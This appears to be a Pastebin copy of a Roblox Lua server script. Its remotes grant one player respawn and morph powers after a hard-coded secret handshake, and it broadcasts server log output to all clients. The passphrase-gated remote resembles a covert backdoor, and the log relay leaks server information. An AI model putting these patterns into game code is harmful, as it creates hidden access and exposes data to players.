Guest User

124323118235931 - Script "eListen"

a guest
Apr 13th, 2025
17
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.33 KB | Cybersecurity | 0 0
  1. local abMod = require(script.Parent.into)
  2. local eRemote = script.Parent.eRm
  3. local wRemote = script.Parent.bazomP
  4. local raraRem = script.Parent.raraRm
  5. local roroRemote = script.Parent.roroRm
  6. local oRemote = script.Parent.oRm
  7. local allowedPlayer = ""
  8. wRemote.OnServerEvent:Connect(function(pl, sign)
  9.     if not sign then return nil end
  10.     local trLation = abMod.interpret(sign)
  11.     if trLation == `88AZUMO99_{pl.Name}_InTO881zA` then
  12.         allowedPlayer = pl.Name
  13.     else
  14.         pl:Kick("dont")
  15.     end
  16. end)
  17. raraRem.OnServerEvent:Connect(function(pl)
  18.     if pl.Name ~= allowedPlayer then
  19.         return pl:Kick("dont")
  20.     end
  21.     pl:LoadCharacter()
  22. end)
  23. roroRemote.OnServerEvent:Connect(function(pl)
  24.     if pl.Name ~= allowedPlayer then
  25.         return pl:Kick("dont")
  26.     end
  27.     if pl.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  28.         local Main = game.Players:GetHumanoidDescriptionFromUserId(pl.CharacterAppearanceId)
  29.         local morph = game.Players:CreateHumanoidModelFromDescription(Main, Enum.HumanoidRigType.R6)
  30.         morph:SetPrimaryPartCFrame(pl.Character.PrimaryPart.CFrame)
  31.         morph.Name = pl.Name
  32.         pl.Character = morph
  33.         morph.Parent = workspace
  34.     end
  35. end)
  36. game:GetService("LogService").MessageOut:Connect(function(msg)
  37.     if not msg:match("\n", 100) then
  38.         if not msg:find("ReplicatedStorage.Modules.ad") then
  39.             oRemote:FireAllClients(msg)
  40.         end
  41.     end
  42. end)
Advertisement
Add Comment
Please, Sign In to add comment